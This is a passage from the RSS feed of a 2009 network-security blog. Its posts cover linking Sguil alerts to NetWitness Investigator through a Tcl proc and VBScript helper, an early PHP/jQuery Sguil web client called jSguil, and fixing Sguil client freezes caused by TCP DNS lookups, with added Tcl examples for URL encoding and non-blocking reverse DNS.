    set cnxID [lindex $sidcidList 1]
    set sensorID [lindex $sidcidList 0]
    set proto [$CUR_SEL_PANE(name) getcells $selectedIndex,ipproto]

    set srcIP [$CUR_SEL_PANE(name) getcells $selectedIndex,srcip]
    set srcPort [$CUR_SEL_PANE(name) getcells $selectedIndex,srcport]
    set dstIP [$CUR_SEL_PANE(name) getcells $selectedIndex,dstip]
    set dstPort [$CUR_SEL_PANE(name) getcells $selectedIndex,dstport]
    if { $CUR_SEL_PANE(format) == "SSN" } {
       set timestamp [$CUR_SEL_PANE(name) getcells $selectedIndex,starttime]
    } else {
       set timestamp [$CUR_SEL_PANE(name) getcells $selectedIndex,date]
    }

    exec wscript c:/users/user/test.vbs "nw://test?collection=test&amp;time=All+Data&amp;more-states=&amp;more-all-states=&amp;name=$srcIP+%3E+$dstIP+%3A+$dstPort&amp;where=ip.src%3D$srcIP+%26%26+ip.dst%3D$dstIP+%26%26+tcp.dstport%3D$dstPort&amp;view=session"
}</pre>
<p>Now you will notice that the second to last line executes a vbscript called test.vbs in c:\users\user\. The contents of that file are as follows (and yes, all those quotes are necessary, as you escape a quote with another quote when writing vbscript):</p>
<pre>Set objShell = Wscript.CreateObject("Wscript.Shell")
Set ArgObj = WScript.Arguments

Cmd = """" &amp; "c:\windows\system32\explorer.exe" &amp; """" &amp; " " &amp; """" &amp; WScript.Arguments.Item(0) &amp; """"

objShell.Run Cmd</pre>
<p>When this gets executed, it will have the NetWitness url (nw://&lt;url&gt;) with the source ip, destination ip and destination port, passed to the Windows shell (explorer.exe). We will be going back and adding time into the mix as well once our actual NetWitness deployment is up and running. We are currently just testing and demonstrating for proof of concept using the free version of NetWitness Investigator 9:</p>
<p style="TEXT-ALIGN: center"><img class="size-full wp-image-146  aligncenter" title="SguilandNetWitness2" src="http://trojanedbinaries.com/blog/wp-content/uploads/2009/12/SguilandNetWitness2.jpg" alt="SguilandNetWitness2" width="807" height="510" /></p>
<p>Now, this definitely does not seem like the most direct or correct way to do this. However, we discovered some odd behavior that led us down this path. If you attempt to pass the URL directly to the NwInvestigator.exe binary, it will crash it. If you attempt to pass the URL directly to explorer.exe from within the TCL script, it only opens up explorer but it does not open up NetWitness Investigator. I believe it has something to do with the quoted arguments and how they are passed, but I could not fix it as I know little of TCL and even less about how it works on Windows.</p>
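<p>The procs in this post and in the &#8220;Take Two&#8221; post above both assemble the nw:// URL by hand from pre-encoded fragments. As an added example (not code from either post, from Sguil or from NetWitness), here is a generic Tcl builder that covers the TCP/UDP/ICMP and to/from cases of Take Two, computes the centred time window, and percent-encodes every alert field before it reaches the query. Assumed: the nw://broker/?name=...&amp;time=...&amp;view=...&amp;where=... layout and the meta keys (ip.src, tcp.srcport, ...) exactly as they appear in the posts&#8217; URLs; the sample alert values at the bottom are constructed.</p>

```tcl
# Added example: generic builder for the nw:// pivot URLs that the Sguil
# NetWitness/NetWitnessEvent procs in the posts assemble by hand.
# Assumptions: URL layout and meta keys are taken from the posts' URLs;
# nothing here is the project's own code.

package require Tcl 8.5

# Percent-encode one query value so the separators NetWitness parses
# (= & : > |) can never be supplied by an alert field; spaces become '+'
# exactly as in the hand-built URLs.
proc nwEncode { value } {
    set out ""
    foreach ch [split $value ""] {
        if { [string is alnum -strict $ch] || [string first $ch "-._~"] >= 0 } {
            append out $ch
        } elseif { $ch eq " " } {
            append out "+"
        } else {
            foreach byte [split [encoding convertto utf-8 $ch] ""] {
                binary scan $byte H2 hex
                append out "%" [string toupper $hex]
            }
        }
    }
    return $out
}

# Window of $hours total hours centred on the alert time (Sguil stores GMT),
# so 1 -> +/-30 min and 24 -> +/-12 h, the two branches of the Take Two proc.
proc nwTimeWindow { timestamp hours } {
    set fmt {%Y-%m-%d %H:%M:%S}
    set base [clock scan $timestamp -format $fmt -gmt 1]
    set half [expr {$hours * 1800}]
    return [list [clock format [expr {$base - $half}] -format $fmt -gmt 1] \
                 [clock format [expr {$base + $half}] -format $fmt -gmt 1]]
}

# Label and where= clause for one alert. proto is ip.proto from the alert
# (6/17/1); direction "to" swaps the endpoints like the original proc does.
proc nwSessionQuery { proto srcIP srcPort dstIP dstPort direction } {
    if { $direction eq "to" } {
        lassign [list $dstIP $dstPort $srcIP $srcPort] srcIP srcPort dstIP dstPort
    }
    switch -- $proto {
        6       { set l4 tcp }
        17      { set l4 udp }
        1       { set l4 "" }
        default { error "unsupported ip.proto: $proto" }
    }
    if { $l4 eq "" } {
        return [list "ICMP || $srcIP -> $dstIP" \
                     "ip.src=$srcIP && ip.dst=$dstIP && ip.proto=1"]
    }
    return [list "[string toupper $l4] || $srcIP:$srcPort -> $dstIP:$dstPort" \
                 "ip.src=$srcIP && $l4.srcport=$srcPort && ip.dst=$dstIP && $l4.dstport=$dstPort"]
}

# Assemble the URL; every value passes through nwEncode, so the only literal
# '=' and '&' in the result are the ones separating parameters.
proc nwUrl { label past future where {view session} } {
    set parts {}
    foreach {k v} [list name $label time "$past to $future" view $view where $where] {
        lappend parts "$k=[nwEncode $v]"
    }
    return "nw://broker/?[join $parts &]"
}

# Hand the finished URL to the helper script from the posts (path as used
# there; adjust to where nw.vbs/test.vbs actually lives).
proc nwOpen { url {script c:/users/analyst/nw.vbs} } {
    exec wscript $script $url
}

# Constructed alert: a TCP session, one-hour window around the alert time.
lassign [nwTimeWindow "2010-01-14 15:42:10" 1] past future
lassign [nwSessionQuery 6 192.168.1.5 57019 71.191.147.210 80 from] label where
puts [nwUrl $label $past $future $where]
```

<p>Running the script prints the same shape of URL the NetWitnessEvent proc builds for TCP; calling <code>nwOpen</code> on it is the step that launches Investigator.</p>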
]]></content:encoded>
			<wfw:commentRss>http://trojanedbinaries.com/blog/?feed=rss2&amp;p=143</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>jSguil</title>
		<link>http://trojanedbinaries.com/blog/?p=133</link>
		<comments>http://trojanedbinaries.com/blog/?p=133#comments</comments>
		<pubDate>Tue, 01 Dec 2009 13:32:18 +0000</pubDate>
		<dc:creator>Eoin Miller</dc:creator>
				<category><![CDATA[Sguil]]></category>
		<category><![CDATA[jSguil]]></category>

		<guid isPermaLink="false">http://trojanedbinaries.com/blog/?p=133</guid>
		<description><![CDATA[<p>We really do love Sguil, but the client and server lack a few desirable things. As far as I can tell, there is only one SQL connection shared between the server and all the clients connecting to it. Obviously if someone runs a SANCP query that is a little over the top, until it comes back [...]]]></description>
			<content:encoded><![CDATA[<p>We really do love <a href="http://sguil.sourceforge.net/">Sguil</a>, but the client and server lack a few desirable things. As far as I can tell, there is only one SQL connection shared between the server and all the clients connecting to it. Obviously if someone runs a SANCP query that is a little over the top, until it comes back everyone else cannot query the database. This would make sense as the Sguil server requires the <a href="http://wiki.tcl.tk/16140"><strong>non</strong>-threaded version of TCL</a> to work. <a href="http://en.wikipedia.org/wiki/LAMP_(software_bundle)">LAMP</a> based applications don&#8217;t run into this single-connection-for-all-users bottleneck as Apache and MySQL are multithreaded and each request will create its own (or multiple) database connection for the POST/GET and then close it on completion. I already knew about <a href="http://squert.sourceforge.net/">SQuerT</a>, but it lacks a few things, such as an authentication mechanism. There is also a <a href="http://sguil.cvs.sourceforge.net/viewvc/sguil/sguil/web/">web client directly associated with the Sguil project</a>, but it was never fully completed and most of the application is a mock up. Lastly, the current Sguil clients will not be that easy to integrate with our upcoming <a href="http://www.netwitness.com/">NetWitness</a> deployment. The combination of the two should be quite awesome.</p>
<p>So I have decided to start developing, what I am calling for now, jSguil. It will be along the lines of SQuerT in that it is not meant to be a function for function replacement for the standard TCL Sguil client. This basically gives me an excuse to actually buckle down and learn JSON/jQuery/webtwodotoh. It will be written in <a href="http://php.net/">PHP</a> and utilize <a href="http://jquery.com">jQuery</a>/<a href="http://www.trirand.com/blog/">jqgrid</a>. Development so far has been slow and painful as I continuously learn how to actually write PHP/JavaScript (sort of). It ends up with me having to redo the entire thing I just spent two hours on due to discovering how to do something in a much better manner. Below is a screenshot of just the SANCP queries you can run. You can sort the results of each column by clicking on it. You may also notice the data is paginated and currently allows you to view 50/200/500 records at a time. Every time you sort or get a new page, another query is executed for only the number of records you have chosen to display. This keeps the response times quite fast, even on large result sets.</p>
<p><img class="aligncenter size-full wp-image-134" title="jSguil" src="http://trojanedbinaries.com/blog/wp-content/uploads/2009/12/jSguil.gif" alt="jSguil" width="840" height="450" /></p>
]]></content:encoded>
			<wfw:commentRss>http://trojanedbinaries.com/blog/?feed=rss2&amp;p=133</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Sguil Client Reverse DNS Causes Client To Freeze?</title>
		<link>http://trojanedbinaries.com/blog/?p=129</link>
		<comments>http://trojanedbinaries.com/blog/?p=129#comments</comments>
		<pubDate>Fri, 27 Nov 2009 11:12:22 +0000</pubDate>
		<dc:creator>Eoin Miller</dc:creator>
				<category><![CDATA[Sguil]]></category>

		<guid isPermaLink="false">http://trojanedbinaries.com/blog/?p=129</guid>
		<description><![CDATA[<p>If you have ever tried to use the Sguil client&#8217;s reverse DNS under the IP Resolution tab and noticed that it caused the application to be unresponsive, here is the reason why. Tcl uses TCP for DNS by default. So if your DNS server does not allow TCP DNS, the client just sits there endlessly [...]]]></description>
			<content:encoded><![CDATA[<p>If you have ever tried to use the <a href="http://sguil.sourceforge.net/">Sguil</a> client&#8217;s reverse DNS under the IP Resolution tab and noticed that it caused the application to be unresponsive, here is the reason why. <a href="http://www.tcl.tk">Tcl</a> uses TCP for DNS by default. So if your DNS server does not allow TCP DNS, the client just sits there endlessly attempting to create the TCP socket connection every time it tries to do a gethostbyaddr(). You can review the configuration by doing the following inside of tclsh:</p>
<pre># tclsh
% package require dns
1.3.2
% dns::configure
-loglevel warn -nameserver 192.168.1.1 -port 53 -protocol tcp -search {} -timeout 30000</pre>
<p>If you want the client to do UDP DNS queries, you have to ensure you have the <a href="http://tcludp.sourceforge.net/">tcludp</a> package installed. With Ubuntu, the package is named libudp-tcl. So the following should get you Ubuntu guys where you need to go:</p>
<pre># apt-get install libudp-tcl
# tclsh
% package require dns
1.3.2
% dns::configure
-loglevel warn -nameserver 192.168.1.1 -port 53 -protocol udp -search {} -timeout 30000</pre>
<p>Or, alternatively, you can always just open up 53/TCP on your DNS server.</p>
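<p>As an added example (not code from the post or from the Sguil client), here is how a client can do the same reverse lookup without ever freezing: it picks UDP when tcludp loads, otherwise stays on TCP but with a short timeout, and issues the PTR query asynchronously so the Tk event loop keeps running until the answer (or the timeout) arrives. Assumed and not from the post: the 5 s timeout, the callback shape, and the use of <code>dns::resolve -command</code> from tcllib.</p>

```tcl
# Added example: non-blocking reverse DNS for a Tk client such as Sguil.
# Assumptions: tcllib dns (with optional tcludp) is installed; the 5000 ms
# timeout and the callback convention are choices made here, not Sguil's.

package require Tcl 8.5
package require dns

# Pick the transport once at startup and return the protocol in use.
proc configureDns { nameserver } {
    if { [catch { package require udp }] } {
        # tcludp missing: stay on TCP, but cap the wait instead of the
        # 30000 ms default that dns::configure reports.
        dns::configure -nameserver $nameserver -protocol tcp -timeout 5000
        return tcp
    }
    dns::configure -nameserver $nameserver -protocol udp -timeout 5000
    return udp
}

# 192.168.1.5 -> 5.1.168.192.in-addr.arpa
proc ptrName { ip } {
    return "[join [lreverse [split $ip .]] .].in-addr.arpa"
}

# Issue the PTR query without blocking. $callback is a command prefix that
# is invoked later, from the event loop, with the list of names (empty on
# timeout or error); that is the point at which the GUI should be updated.
proc reverseLookup { ip callback } {
    return [dns::resolve [ptrName $ip] -type PTR \
                -command [list reverseDone $callback]]
}

# dns::resolve appends the token when the query completes.
proc reverseDone { callback token } {
    set names {}
    if { [dns::status $token] eq "ok" } {
        set names [dns::name $token]
    }
    dns::cleanup $token
    uplevel #0 $callback [list $names]
}

# Demo: with no argument only the transport choice is made (no network I/O);
# "tclsh script.tcl 192.168.1.5" runs one lookup and waits for the callback.
set proto [configureDns 192.168.1.1]
puts "reverse DNS will use $proto"
if { [llength $argv] > 0 } {
    reverseLookup [lindex $argv 0] {apply {names {
        if { [llength $names] } { puts "PTR: $names" } else { puts "PTR: no answer" }
        set ::done 1
    }}}
    vwait ::done
}
```

<p>In a real client the callback would write into the IP Resolution tab instead of printing, and <code>vwait</code> is unnecessary because Tk already runs the event loop.</p>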
]]></content:encoded>
			<wfw:commentRss>http://trojanedbinaries.com/blog/?feed=rss2&amp;p=129</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
